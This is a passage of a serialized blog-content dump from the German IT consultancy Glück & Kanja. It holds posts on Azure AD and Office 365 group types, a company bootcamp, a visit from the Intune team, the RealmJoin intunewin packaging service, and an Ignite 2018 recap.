der zentrale Verzeichnisdienst, und das AD hat nur noch eine Legacy-Funktion. Das AAD ist technisch grundverschieden zum AD, entsprechend gibt es dort keine direkten Entsprechungen der Gruppentypen.",[353,1637,1638],{},"Unternehmen müssen sich also neu überlegen, für welche organisatorischen und Rechte-Strukturen sie welche Gruppentypen verwenden. Dieser Artikel gibt als Einstieg zur Entwicklung eines entsprechenden Konzepts einen Überblick der verschiedenen Gruppentypen in Office 365 und Azure und wie sie verschachtelt werden können. Das folgende Diagramm skizziert die Verschachtelungszusammenhänge (bitte nicht erschrecken, im Admin-Alltag muss man das nicht alles auswendig wissen):",[353,1640,1641],{},[356,1642],{"alt":1643,"src":1644},"Diagramm der Gruppenzusammenhänge","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/gruppenzusammenhaenge.png",[353,1646,1647],{},"Manche Verschachtelungen sind über die Web-Konsole allerdings nicht möglich. Eine O365-Gruppe kann nur über PowerShell einer Distribution List hinzugefügt werden, nicht über die GUI. Wenn man einer Gruppe über das Azure-Portal ein nicht erlaubtes Gruppenmitglied hinzufügt, beispielsweise eine Security Group einer Mail-enabled Security Group, dann kommt leider auch keine Fehlermeldung, sondern im Gegenteil eine (falsche) Erfolgsmeldung. Alle Gruppen außer Azure AD Security Groups vom Mitgliedstyp Dynamic Device können Nutzer als Mitglied enthalten.\nAuch bei den PowerShell-CMDlets nicht gleich offensichtlich:",[367,1649,1650,1659],{},[370,1651,1652,1653,1658],{},"Security Groups und Konsorten kann man über ",[374,1654,1657],{"href":1655,"rel":1656},"https://docs.microsoft.com/en-us/powershell/module/azuread/?view=azureadps-2.0#groups",[378],"die PowerShell-CMDlets *-AzureADGroup*"," verwalten.",[370,1660,1661,1662,1667],{},"Mail-enabled Security Groups, Distribution Lists und O365-Groups werden stattdessen über ",[374,1663,1666],{"href":1664,"rel":1665},"https://technet.microsoft.com/en-us/library/dn641234(v=exchg.160).aspx",[378],"die PowerShell-CMDlets der Exchange Powershell"," verwaltet.",[629,1669,1671],{"id":1670},"office-365-gruppen","Office 365-Gruppen",[353,1673,1674],{},"Das Herzstück der Nutzerstruktur bei Office 365 sind die Office-365-Gruppen oder kurz O365-Gruppen. Ihre Funktion ist zugleich Sicherheitsgruppe, E-Mailverteiler und gemeinsame Dateiablage. Zahlreiche Office-365-Dienste basieren im Hintergrund auf einer O365-Gruppe, beispielsweise Teams oder Planner.",[353,1676,1677],{},"Eine wichtige Unterscheidung sind öffentliche und geschlossene O365-Gruppen. Öffentlichen Gruppen kann jeder Nutzer des Tenants selbst beitreten und auf Daten der Gruppe auch ohne Beitritt zugreifen. Bei geschlossenen O365-Gruppen ist die Unterscheidung zwischen Eigentümer und Mitglied wichtig: Eigentümer können Mitglieder aufnehmen und entfernen und nur als Mitglied kann man auf Daten der O365-Gruppe zugreifen.",[353,1679,1680],{},"Ein Group-Nesting von O365-Gruppen ist nicht möglich: Eine O365-Gruppe kann nur einzelne Nutzer als Mitglied haben, keine anderen Gruppen irgendeines Typs. Die O365-Gruppe kann selbst auch nicht Mitglied anderer O365- oder Security-Gruppen sein, außer von mail-enabled Security Groups und Verteilerlisten.",[629,1682,964],{"id":1683},"teams",[353,1685,1686],{},"Jedes Team basiert auf einer O365-Gruppe. Ein Team enthält Channels mit eigenem Chat, eigenen Dateien und ähnlichem. Wenn man Mitglied eines Teams ist, also Mitglied der zugrundeliegenden O365-Gruppe, kann man jeden einzelnen Channel",[367,1688,1689,1692,1695],{},[370,1690,1691],{},"nicht favorisieren,",[370,1693,1694],{},"favorisieren oder",[370,1696,1697],{},"favorisieren und dem Channel folgen.",[353,1699,1700],{},"Den Channel Allgemein/General favorisiert man als Team-Mitglied immer, zusätzlich kann man ihm folgen.",[629,1702,1704],{"id":1703},"security-groups","Security Groups",[353,1706,1707],{},"Als nahezu universelles Werkzeug der Berechtigungsverwaltung können Security Groups vom Mitgliedstyp Assigned/Zugewiesen (später mehr zur Alternative Dynamisch) fast alle anderen Objekttypen enthalten, nämlich neben Nutzern und Geräten auch dynamische Gruppen und Mail-enabled Security Groups. Was allerdings fehlt sind vor allem O365-Gruppen, was angesichts der zentralen Stellung der O365-Gruppen ein großes Manko ist.",[629,1709,1711],{"id":1710},"azure-ad-dynamic-groups","Azure AD Dynamic Groups",[353,1713,1714],{},"Bei Sicherheitsgruppen vom Mitgliedstyp Dynamic/Dynamisch legt man die Mitglieder nicht manuell oder über ein Skript fest, sondern definiert Attribut-basierte Regeln darüber, wer Mitglied der Gruppe sein soll. Die Regeln werden automatisch von einem Hintergrunddienst evaluiert und die Mitgliedsliste neu geschrieben. Das erste Schreiben der Mitgliederliste kann bei großen Verzeichnissen bis zu 24 Stunden dauern. Eine Azure AD Dynamic Group kann nur entweder Nutzer oder Geräte enthalten, aber weder beides noch andere Gruppen.",[629,1716,1718],{"id":1717},"mail-enabled-security-groups","Mail-enabled Security Groups",[353,1720,1721],{},"Nur auf den ersten Blick ähnlich zu Security Groups sind Mail-enabled Security Groups. Wie im Diagramm zu sehen, können Mail-enabled Security Groups nämlich keine Security Groups enthalten. Sie werden auch nicht über das Azure-Portal verwaltet, sondern über das Office-365-Portal.",[629,1723,1725],{"id":1724},"distribution-list","Distribution List",[353,1727,1728],{},"Ein E-Mail-Verteiler hat technisch die gleiche Funktion wie on-premises: E-Mails an den Verteiler erreichen automatisch alle Mitglieder. Allerdings sind O365-Gruppen deutlich vielseitiger, so dass Distribution Lists in der Cloud eine deutlich untergeordnete Rolle spielen.",[629,1730,1732],{"id":1731},"exchange-dynamic-distribution-group","Exchange Dynamic Distribution Group",[353,1734,1735],{},"Auch dieser Gruppentyp ist über Exchange und Exchange Online direkt aus der on-premises-Welt übernommen worden und entspricht einer Distribution List, bei der die Mitglieder nicht einzeln eingetragen werden, sondern über bestimmte Regeln Attribut-basiert hinzugefügt oder entfernt werden. Da Azure AD Dynamic Groups nicht mail-enabled sein können, gibt es auch in der Cloud gelegentlich Anwendungsfälle für diesen Gruppentyp.",[629,1737,1739],{"id":1738},"azure-ad-administrative-units","Azure AD Administrative Units",[353,1741,1742],{},"Administrative Units (AUs) entsprechen in ihrer Zielsetzung den Organizational Units (OUs) des alten Active Directory: Die Mitgliedschaft gibt den Mitgliedern nicht Zugriff auf zusätzliche Ressourcen, sondern lokale Administratoren erhalten Rechte zur Verwaltung der Mitglieder. Entsprechend stehen sie nicht in Beziehung zu den anderen Gruppentypen, Nesting ist also beispielsweise nicht möglich. Als Methode zur Strukturierung der Nutzerbasis gehören sie trotzdem in diese Übersicht.",[629,1744,1746],{"id":1745},"zusammenfassung","Zusammenfassung",[353,1748,1749],{},"Das Azure AD räumt auf mit den alten Strukturen aus AD-Zeiten, dennoch gibt es schon einen bunten Strauß an neuen Gruppentypen, deren Zusammenhänge nicht auf den ersten Blick zu sehen sind. Einige Gruppentypen werden aber kaum gebraucht und verschwinden vielleicht mittelfristig ganz.",{"title":402,"searchDepth":403,"depth":403,"links":1751},[1752,1753,1754,1755,1756,1757,1758,1759,1760],{"id":1670,"depth":704,"text":1671},{"id":1683,"depth":704,"text":964},{"id":1703,"depth":704,"text":1704},{"id":1710,"depth":704,"text":1711},{"id":1717,"depth":704,"text":1718},{"id":1724,"depth":704,"text":1725},{"id":1731,"depth":704,"text":1732},{"id":1738,"depth":704,"text":1739},{"id":1745,"depth":704,"text":1746},{"categories":1762,"blogtitlepic":1763,"thumb":1764,"socialimg":1765,"customExcerpt":1766},[534],"head-groups-in-o365","thumb-groups-in-o365","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-groups-in-o365.jpg","Unternehmen müssen sich neu überlegen, für welche organisatorischen und Rechte-Strukturen sie welche Gruppentypen verwenden. Dieser Artikel gibt als Einstieg zur Entwicklung eines entsprechenden Konzepts einen Überblick der verschiedenen Gruppentypen in Office 365 und Azure und wie sie verschachtelt werden können.","2018-08-15","/posts/2018-08-15-gruppen-in-azure-und-o365",{"title":1629,"description":1635},"posts/2018-08-15-gruppen-in-azure-und-o365",[534,1772,964,1117,1773],"Identity","Azure","cDMhVeRojrPCsr-3N7Xwj21FXolNMkeHxlMZq_fyKPQ",{"id":1776,"title":1777,"author":191,"body":1778,"cta":3,"description":1813,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1814,"moment":1820,"navigation":415,"path":1821,"seo":1822,"stem":1823,"tags":1824,"webcast":406,"__hash__":1826},"content_de/posts/2018-08-27-bootcamp.md","Glück & Kanja Goes Bootcamp",{"type":350,"value":1779,"toc":1811},[1780,1791,1797,1804],[353,1781,1782,1783,1786,1787,1790],{},"Alle zwei Jahre nehmen wir uns eine einwöchige Auszeit vom Daily Business, um uns im ",[433,1784,1785],{},"GK Bootcamp"," ganz den neuesten Trends und Technologien widmen zu können. Mit dem diesjährigen Motto bleiben wir natürlich unserer 100% Cloud Strategie treu. Client Roadmap, Microsoft Graph, Azure Automation, Modern Workplace Services, Security Operations Center und UC Cloud Transformation stehen auf dem Programm, um nur einige der vielen Teilbereiche zu nennen, die am Ende zu einen vollumfänglichen ",[433,1788,1789],{},"100% Cloud Blueprint für Enterprise Unternehmen"," führen.",[353,1792,1793],{},[356,1794],{"alt":1795,"src":1796},"Konferenzhalle","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/thumb-bc-workshop.jpg",[353,1798,1799,1800,1803],{},"Der Ansatz: keine langweiligen Vorträge, kein Mumpitz, dafür viel Power-Wissen und wertvolles Networking. Neben der Arbeit an konkrekten Fragestellungen mit Lab-Szenarien stehen zwischendurch auch immer wieder ",[433,1801,1802],{},"technikferne Lightning Talks"," auf dem Programm. Neben der Arbeit kommen natürlich auch Sport und Spiel nicht zu kurz: Poker, Tischkicker, Fussball. Und das eine oder andere Bier wird natürlich auch getrunken. Höhepunkt ist dann am Samstag ein großes Get-together mit Rahmenprogramm in entspannter Atmosphäre mit den eigens dafür nachgereisten Familien.",[353,1805,1806,1807,1810],{},"Um Ihnen einen Einblick in unsere Arbeit vor Ort zu geben, senden wir unseren nächsten ",[374,1808,558],{"href":556,"rel":1809},[378]," daher live aus der GK Bootcamp Halle. Sie sollten es nicht verpassen!",{"title":402,"searchDepth":403,"depth":403,"links":1812},[],"Alle zwei Jahre nehmen wir uns eine einwöchige Auszeit vom Daily Business, um uns im GK Bootcamp ganz den neuesten Trends und Technologien widmen zu können. Mit dem diesjährigen Motto bleiben wir natürlich unserer 100% Cloud Strategie treu. Client Roadmap, Microsoft Graph, Azure Automation, Modern Workplace Services, Security Operations Center und UC Cloud Transformation stehen auf dem Programm, um nur einige der vielen Teilbereiche zu nennen, die am Ende zu einen vollumfänglichen 100% Cloud Blueprint für Enterprise Unternehmen führen.",{"categories":1815,"blogtitlepic":1816,"thumb":1817,"socialimg":1818,"customExcerpt":1819},[410],"head-gk-bootcamp","thumb-gk-bootcamp","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-gk-bootcamp.jpg","Contoso Enterprises Cloud Blueprint lautet das Thema des siebten Glück & Kanja Bootcamps, das vom 10. bis 15. September 2018 im Haus Patmos in Siegen stattfindet.","2018-08-27","/posts/2018-08-27-bootcamp",{"title":1777,"description":1813},"posts/2018-08-27-bootcamp",[1825],"Bootcamp","eldoZsluQesbDYZwTC_hLHLqja2dMnUrB4NYPONMXGY",{"id":1828,"title":1829,"author":1830,"body":1831,"cta":3,"description":1870,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1871,"moment":1877,"navigation":415,"path":1878,"seo":1879,"stem":1880,"tags":1881,"webcast":406,"__hash__":1882},"content_de/posts/2018-08-28-intune-produkt-team-in-of.md","Redmond zu Besuch in Offenbach",[191],{"type":350,"value":1832,"toc":1868},[1833,1855,1862],[353,1834,1835,1836,1840,1841,1845,1846,1850,1851,1854],{},"Erneuter Besuch aus Redmond: Bryan Keller, Principle PM Manager for Microsoft Intune and Enterprise Mobility, und John Vintzel, Principal Program Manager Lead und verantwortlich für das neue Software Deployment Format MSIX, besuchten uns zwei Tage in Offenbach. Natürlich durften auch unser ",[374,1837,1839],{"href":1609,"rel":1838},[378],"MVP Oliver Kieselbach"," und Jan Berdel, Chief Developer ",[374,1842,494],{"href":1843,"rel":1844},"https://realmjoin.com/",[378],", nicht fehlen. Wir hatten tolle Gespräche und es wurden weitere Details zur Zukunft von Microsoft Intune, Modern Management und Modern Deployment diskutiert, beispielsweise die News zu █████████",[1847,1848,1849],"sup",{},"1",", █████████ und █████████. Gerade auch im Hinblick auf die bevorstehende ",[433,1852,1853],{},"Microsoft Tech Konferenz Ignite"," besonders interessant. Vielen Dank für Euren Besuch!",[353,1856,1857],{},[433,1858,1859,1861],{},[1847,1860,1849],{},"  NDA bis zur Ignite",[353,1863,1864],{},[356,1865],{"alt":1866,"src":1867},"Development Team","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/intune-ems-team-in-of.jpg",{"title":402,"searchDepth":403,"depth":403,"links":1869},[],"Erneuter Besuch aus Redmond: Bryan Keller, Principle PM Manager for Microsoft Intune and Enterprise Mobility, und John Vintzel, Principal Program Manager Lead und verantwortlich für das neue Software Deployment Format MSIX, besuchten uns zwei Tage in Offenbach. Natürlich durften auch unser MVP Oliver Kieselbach und Jan Berdel, Chief Developer RealmJoin, nicht fehlen. Wir hatten tolle Gespräche und es wurden weitere Details zur Zukunft von Microsoft Intune, Modern Management und Modern Deployment diskutiert, beispielsweise die News zu █████████1, █████████ und █████████. Gerade auch im Hinblick auf die bevorstehende Microsoft Tech Konferenz Ignite besonders interessant. Vielen Dank für Euren Besuch!",{"categories":1872,"blogtitlepic":1873,"thumb":1874,"socialimg":1875,"customExcerpt":1876},[410],"head-intune-ems-team","thumb-intune-ems-team","blog/pics/intune-ems-team-in-of.jpg","Erneuter Besuch aus Redmond: Bryan Keller, Principle PM Manager for Microsoft Intune and Enterprise Mobility, und John Vintzel, Principal Program Manager Lead und verantwortlich für das neue Software Deployment Format MSIX, besuchten uns zwei Tage in Offenbach.","2018-08-28","/posts/2018-08-28-intune-produkt-team-in-of",{"title":1829,"description":1870},"posts/2018-08-28-intune-produkt-team-in-of",[422],"8TKhIewy9PEAqDlDVrfPrLKaAi41Su3kNEJFY_o2g2M",{"id":1884,"title":1885,"author":191,"body":1886,"cta":3,"description":1909,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1910,"moment":1916,"navigation":415,"path":1917,"seo":1918,"stem":1919,"tags":1920,"webcast":406,"__hash__":1921},"content_de/posts/2018-09-20-back-from-bootcamp.md","Wir sind zurück vom Bootcamp 2018",{"type":350,"value":1887,"toc":1907},[1888,1895,1898,1904],[353,1889,1890,1891,1894],{},"Alle Kollegen von Glück & Kanja sind zurück vom ",[433,1892,1893],{},"Bootcamp2018"," mit vielen neuen Eindrücken und Ideen. Wir hatten eine tolle Zeit mit einem Deep Dive in spannende Themen rund um Office 365, Azure Automation, Security Operations Center und UC Cloud Transformation. Unser Contoso Enterprises Cloud Blueprint ist fertig und dokumentiert. Sprechen Sie uns an, wenn es sie interessiert und Sie weitere Informationen hierüber erhalten möchten.",[353,1896,1897],{},"Neben der täglichen Arbeit hatten wir natürlich auch Zeit für ein vielseitiges Rahmenprogramm.",[353,1899,1900],{},[356,1901],{"alt":1902,"src":1903},"Arrow Tag","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/gk-is-playing-arrow-tag.jpg",[353,1905,1906],{},"Ein Dankeschön an alle Teilnehmer, insbesondere an das Orga Team vorab und vor Ort, die zu Höchstleistung aufgelaufen sind und ohne die ein Arbeiten nicht möglich gewesen wäre!",{"title":402,"searchDepth":403,"depth":403,"links":1908},[],"Alle Kollegen von Glück & Kanja sind zurück vom Bootcamp2018 mit vielen neuen Eindrücken und Ideen. Wir hatten eine tolle Zeit mit einem Deep Dive in spannende Themen rund um Office 365, Azure Automation, Security Operations Center und UC Cloud Transformation. Unser Contoso Enterprises Cloud Blueprint ist fertig und dokumentiert. Sprechen Sie uns an, wenn es sie interessiert und Sie weitere Informationen hierüber erhalten möchten.",{"categories":1911,"blogtitlepic":1912,"thumb":1913,"socialimg":1914,"customExcerpt":1915},[410],"head-back-from-bootcamp","thumb-back-from-bootcamp","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-back-from-bootcamp.jpg","Alle Kollegen von Glück & Kanja sind zurück vom Bootcamp2018 mit vielen neuen Eindrücken und Ideen. Wir hatten eine tolle Zeit mit einem Deep Dive in spannende Themen rund um Office 365, Azure Automation, Security Operations Center und UC Cloud Transformation.","2018-09-20","/posts/2018-09-20-back-from-bootcamp",{"title":1885,"description":1909},"posts/2018-09-20-back-from-bootcamp",[1825],"mcbzzlnHIHGqpY1ZzBsVIkJ3QOPzLP8lo4uj7r2cT8M",{"id":1923,"title":1924,"author":149,"body":1925,"cta":3,"description":2109,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":2110,"moment":2121,"navigation":415,"path":2122,"seo":2123,"stem":2124,"tags":2125,"webcast":406,"__hash__":2130},"content_de/posts/2018-09-25-intunewin.md","Intune Package Store",{"type":350,"value":1926,"toc":2103},[1927,1946,1952,1956,1967,1970,1985,1989,2002,2008,2019,2023,2033,2038,2049,2054,2057,2060,2079,2083],[353,1928,1929,1930,1933,1934,1937,1938,1941,1942,1945],{},"On Monday, September 24, at Ignite in Orlando, Microsoft announced the new ",[433,1931,1932],{},"Intune Win32 App-Packaging"," technology (also named ",[433,1935,1936],{},"intunewin","). Due to our strong relationship with the Intune product group our ",[433,1939,1940],{},"RealmJoin ecosystem"," is already completely adopted to this new format. That means that the new Intune technology is available to deploy ",[433,1943,1944],{},"hundreds of ready-to-use"," Windows application packages from the start. A cloud based package factory is ready to create any custom package request within hours to help customers to deploy 100% cloud managed workplaces - today.",[353,1947,1948],{},[356,1949],{"alt":1950,"src":1951},"RealmJoin at Ignite Intune Session","https://res.cloudinary.com/c4a8/image/upload/blog/pics/intune-ignite-glueckkanja.png",[629,1953,1955],{"id":1954},"background","Background",[353,1957,1958,1959,1962,1963,1966],{},"When the global logistics company ",[433,1960,1961],{},"DB Schenker"," with 60,000 users in more than 1,000 branches needed a modern workplace strategy the idea was born to design a future workplace not only consuming cloud services but living a cloud operated client without any local dependencies. Instead of consolidating over 350 Active Directories, their trusted partner and Microsoft awarded ",[433,1964,1965],{},"Partner of the Year Glück & Kanja"," designed a solution to deploy a large-scale Azure AD together with Microsoft Intune provisioned Windows 10. This enables the customer to deploy secure corporate clients everywhere - no matter if the user works from headquarters or the local Starbucks.",[353,1968,1969],{},"{% youtube ABUieErMHLU %}",[353,1971,1972,1973,1976,1977,1980,1981,1984],{},"Based on this experience, a blueprint was created to help other enterprise companies like ",[433,1974,1975],{},"EnBW, Uniper,"," and many more, deploy 100% cloud managed clients. The only real problem was that the deployment of Win32 applications were not possible at this time with native Intune. Glück & Kanja therefore developed a bridge technology called ",[374,1978,494],{"href":492,"rel":1979},[378]," that closed the gap and worked as a companion to Intune to deploy thousands of different Windows applications from Adobe to SAP. Part of this ecosystem was a full-blown cloud based application store with ",[433,1982,1983],{},"pre-packaged Win32 applications"," to fast start any new project with predictable time and budget.",[629,1986,1988],{"id":1987},"the-technology","The Technology",[353,1990,1991,1992,1995,1996,2001],{},"Glück & Kanja designed a ",[433,1993,1994],{},"package factory"," based on modern development best practices. Instead of another incarnation of heavy loaded and aged SCCM or similar package formats and creation processes, the lightweight approach was to create a combination of binaries, metadata, and intelligence, into a well known package format called ",[374,1997,2000],{"href":1998,"rel":1999},"https://www.nuget.org",[378],"NuGet",". These packages are used by millions of developers every day and is proven in countless instances. NuGet are created in a version control system (git) offering a reliable auditing about what, when, and who has changed anything in the lifetime of a package. When a change is committed an Azure driven automation builds the packages within deterministic environments (CI/CD system) and automated tests are done before a package is published to get tested by human delivery experts or key users. Finally, the preview packages are released to production to be deployed on thousands of devices.",[353,2003,2004],{},[356,2005],{"alt":2006,"src":2007},"RealmJoin Portal","https://res.cloudinary.com/c4a8/image/upload/blog/pics/realmjoin-app-portal.png",[353,2009,2010,2011,2014,2015,2018],{},"When working with the ",[433,2012,2013],{},"Intune product group"," and their design of a modern packaging system for Win32 applications, it was obvious that their package format was nearly identical to the approach we have used for the last two years. And because of the automation system we’ve designed to create packages, we did not need to change anything in the sources but instead transformed the automation code to create the ",[433,2016,2017],{},"new .intunewin package format",". We publish the packages directly into the Intune backend by using a pre-release of the Microsoft Graph API for Intune.This made it possible to offer hundreds of ready-to-deploy packages to a diverse customer audience that are interested in removing the barriers of an on-premise bound deployment, in favor of a 100% cloud managed Windows 10 experience.",[629,2020,2022],{"id":2021},"the-product","The Product",[353,2024,2025,2028,2029,2032],{},[374,2026,494],{"href":492,"rel":2027},[378]," is an enterprise ready SaaS infrastructure that supports AutoPilot, Azure AD, and Intune based Windows deployments, with the necessary companion technology to complete the cloud management picture of modern workplace deployments. While Intune was already great in managing lots of aspects in these scenarios a bunch of missing pieces like seamless Bitlocker rollout, asset and license inventory, legacy identity headaches, and most important the deployment of Win32 applications, was not ready for large scale deployments. RealmJoin solves these issues with an ",[433,2030,2031],{},"AzureAD/Intune integrated combination"," of a cloud based, multi-tenant operations backend, a lightweight client agent, and a package factory with a peer2peer-enabled CDN. Also, the package management allows application installation on thousands of machines worldwide with moderate bandwidth by using peer caching and offering all necessary extras like dependencies, staggered deployments, and managing the compliance state of devices.",[353,2034,2035],{},[356,2036],{"alt":2006,"src":2037},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/realmjoin-user-portal.png",[353,2039,2040,2041,2044,2045,2048],{},"With the release of the new Intune package format in October, the ",[433,2042,2043],{},"RealmJoin SaaS"," solution will offer the same companion features to the native Intune deployment ecosystem. A modern workplace deployment will be possible with no on-premise dependency by using the AzureAD and Intune in combination with the RealmJoin offered Intune packages. But this journey will not end by deploying the software - the whole lifecycle is ",[433,2046,2047],{},"cloud managed"," in an intuitive web portal with full insights about the health and state of all systems and easy assignment of software to AzureAD groups within one dashboard. This is also a great approach to separate the levels of administration, and gives first and second level support with the tools they need without the learning curve of a full blown Azure portal.",[353,2050,2051],{},[356,2052],{"alt":2006,"src":2053},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/realmjoin-device-portal.png",[353,2055,2056],{},"The RealmJoin App Store for Microsoft Intune helps to fast start any new project with predictable time and budget.\nBut not only the pre-packaged applications are available for a fixed price. Also the Packaging-as-a-Service offering\nwe provide for all modern workplace projects is a fixed price per package agreement to make your Windows 10 migration\na safe and predictable project.",[353,2058,2059],{},"Along with the RealmJoin App Store, there are a few other products worth mentioning.",[353,2061,2062,2063,2066,2067,2072,2073,2078],{},"The migration to Windows 10 is well supported by great Microsoft Offerings, like Windows Analytics. However, when theory meets reality there are always some road-blockers. One issue we currently see is around documents and particularly ",[433,2064,2065],{},"PST files"," on local disks. ",[374,2068,2071],{"href":2069,"rel":2070},"https://realmigrator.com",[378],"RealMigrator"," is another SaaS product that helps to get the local data safely and silently migrated. And with ",[374,2074,2077],{"href":2075,"rel":2076},"https://konnekt.io",[378],"Konnekt"," we provide for Citrix and the Virtual Desktop world, one can integrate OneDrive OnDemand and SharePoint/Office 365 group access without the headaches of massively synced data.",[629,2080,2082],{"id":2081},"next-steps","Next Steps",[353,2084,2085,2086,2090,2091,2096,2097,2102],{},"If you’re interested in the cloud approach of modern workplaces, we are happy to get ",[374,2087,2089],{"href":2088},"mailto:info@realmjoin.com","in contact"," with you. We've also provided a Website ",[374,2092,2095],{"href":2093,"rel":2094},"https://intunewin.com",[378],"intunewin.com"," and tweet at ",[374,2098,2101],{"href":2099,"rel":2100},"https://twitter.com/intunewin",[378],"@intunewin"," to consolidate all information about the new Intune Win32 application deployment capabilities.",{"title":402,"searchDepth":403,"depth":403,"links":2104},[2105,2106,2107,2108],{"id":1954,"depth":704,"text":1955},{"id":1987,"depth":704,"text":1988},{"id":2021,"depth":704,"text":2022},{"id":2081,"depth":704,"text":2082},"On Monday, September 24, at Ignite in Orlando, Microsoft announced the new Intune Win32 App-Packaging technology (also named intunewin). Due to our strong relationship with the Intune product group our RealmJoin ecosystem is already completely adopted to this new format. That means that the new Intune technology is available to deploy hundreds of ready-to-use Windows application packages from the start. A cloud based package factory is ready to create any custom package request within hours to help customers to deploy 100% cloud managed workplaces - today.",{"categories":2111,"blogtitlepic":2112,"thumb":2113,"socialimg":2114,"customExcerpt":2115,"hreflang":2116,"scripts":2120},[534],"head-intunewin","thumb-intunewin","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-intunewin.jpg","On Monday, September 24, at Ignite in Orlando, Microsoft announced the new Intune Win32 App-Packaging technology (also named intunewin). Due to our strong relationship with the Intune product group our RealmJoin ecosystem is already completely adopted to this new format.",[2117],{"lang":2118,"href":2119},"en","/blog/workplace/2018/09/intunewin-en",{"slick":415,"form":415},"2018-09-24","/posts/2018-09-25-intunewin",{"title":1924,"description":2109},"posts/2018-09-25-intunewin",[534,2126,2127,494,2128,2129],"Intune","Win32","Packaging","Intunewin","8llMY5W53xRRPHtlD6QVKREjLYLOEZCxL0kfWBNudRk",{"id":2132,"title":2133,"author":191,"body":2134,"cta":3,"description":2287,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":2288,"moment":2294,"navigation":415,"path":2295,"seo":2296,"stem":2297,"tags":2298,"webcast":406,"__hash__":2300},"content_de/posts/2018-09-30-ignite-wrap-up.md","Microsoft Ignite Wrap-up",{"type":350,"value":2135,"toc":2279},[2136,2150,2154,2160,2175,2202,2206,2218,2222,2233,2237,2243,2245,2260,2264],[353,2137,2138,2139,2144,2145,2149],{},"Am Freitag ist die ",[374,2140,2143],{"href":2141,"rel":2142},"https://www.microsoft.com/en-us/ignite",[378],"Microsoft Ignite 2018"," zu Ende gegangen. Microsofts größte Veranstaltung für IT-Profis und Unternehmensentwickler wird jedes Jahr größer und kann aktuell auf mehr als 26.000 Teilnehmer aus über 100 Ländern zurückblicken. Unser ",[374,2146,1839],{"href":2147,"rel":2148},"https://oliverkieselbach.com/2018/09/29/ignite-2018-my-wrap-up/",[378]," war live vor Ort und hat die wichtigsten Themen zusammengefasst:",[629,2151,2153],{"id":2152},"intune-win32-app-packaging-technologie","Intune Win32 App-Packaging-Technologie",[353,2155,2156],{},[356,2157],{"alt":2158,"src":2159},"GK auf Ignite","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/ignite-01.jpg",[353,2161,2162,2163,2166,2167,2170,2171,2174],{},"Ab sofort bietet Microsoft die Möglichkeit, Software-Applikationen einschließlich ihrer Installationsdateien in ein ",[433,2164,2165],{},"Container-Format zu packen (*.intunewin)"," und erlaubt somit die Verteilung über Intune. Dies ist eine entscheidende ",[433,2168,2169],{},"Weiterentwicklung von Microsoft Intune",", da es eines der fehlenden Puzzleteile ergänzt, um den modernen Managementansatz vollständig umzusetzen. Kunden können nun direkt ihre Win32-Anwendungen über Intune installieren. Diese Funktionalität wird durch die Microsoft Management Extension unterstützt, die in der Vergangenheit bereits für die PowerShell-Skript-Ausführung mit Intune verwendet wurde. Aufgrund unserer intensiven Zusammenarbeit mit der Intune Produktgruppe ist unser ",[433,2172,2173],{},"RealmJoin-Ökosystem"," vollständig mit diesem Format kompatibel und stellt von Anfang an Hunderte von einsatzbereiten Windows-Anwendungspaketen bereit.",[2176,2177,2178,2197],"center",{},[2179,2180,2184,2192,2193],"blockquote",{"className":2181,"dataLang":2183},[2182],"twitter-tweet","de",[353,2185,2187,2191],{"lang":2118,"dir":2186},"ltr",[374,2188,2190],{"href":2189},"https://twitter.com/glueckkanja?ref_src=twsrc%5Etfw","@glueckkanja"," is a great and innovative partner.  We love the work that they are doing and the value they are bringing to our customers.  Check out this blog on they can help you with a packaging factory!!!   Great work here Christian!","— Brad Anderson (@Anderson) ",[374,2194,2196],{"href":2195},"https://twitter.com/Anderson/status/1045362258878984192?ref_src=twsrc%5Etfw","27. September 2018",[2198,2199],"script",{"async":415,"src":2200,"charSet":2201},"https://platform.twitter.com/widgets.js","utf-8",[629,2203,2205],{"id":2204},"windows-autopilot","Windows Autopilot",[353,2207,2208,2209,2213,2214,2217],{},"Für ",[374,2210,2205],{"href":2211,"rel":2212},"https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/New-Windows-Autopilot-capabilities-and-expanded-partner-support/ba-p/260430",[378]," kündigte Microsoft die Unterstützung von Hybrid Azure AD und die Möglichkeit an, Autopilot-Daten zu sammeln. Hybrid Azure AD Join mag für einige Unternehmen gut sein, unsere Empfehlung lautet aber, Azure AD Join zu bevorzugen, da dieser auch den Zugriff auf lokale AD-Ressourcen mit Kerberos-Authentifizierung unterstützt. Das einfache ",[433,2215,2216],{},"Sammeln von Autopilot-Informationen"," vorhandener Geräte ist großartig und vereinfacht die Schritte zu einer modernen Infrastruktur, bei der alle Geräte auch in einem Neuinstallations- oder Reset-Szenario ein vereinfachtes Setup mit Windows Autopilot verwenden.",[629,2219,2221],{"id":2220},"security-baselines-und-desktop-analytics","Security Baselines und Desktop Analytics",[353,2223,2224,2225,2228,2229,2232],{},"Für Intune lieferte Microsoft viele Sessions über die Verfügbarkeit von Intune Security Baselines und Desktop Analytics. Die ",[433,2226,2227],{},"Intune Security Baselines"," werden bereitgestellt, um Konfigurationslücken zu schließen, die Unternehmen derzeit beim Übergang von einer lokalen AD- und Gruppenrichtlinienumgebung zu einer Azure AD / MDM-Umgebung sehen. Ziel ist es, dass alle erforderlichen Sicherheitseinstellungen in einem cloud managed Szenario verfügbar sind, um den Übergang zu 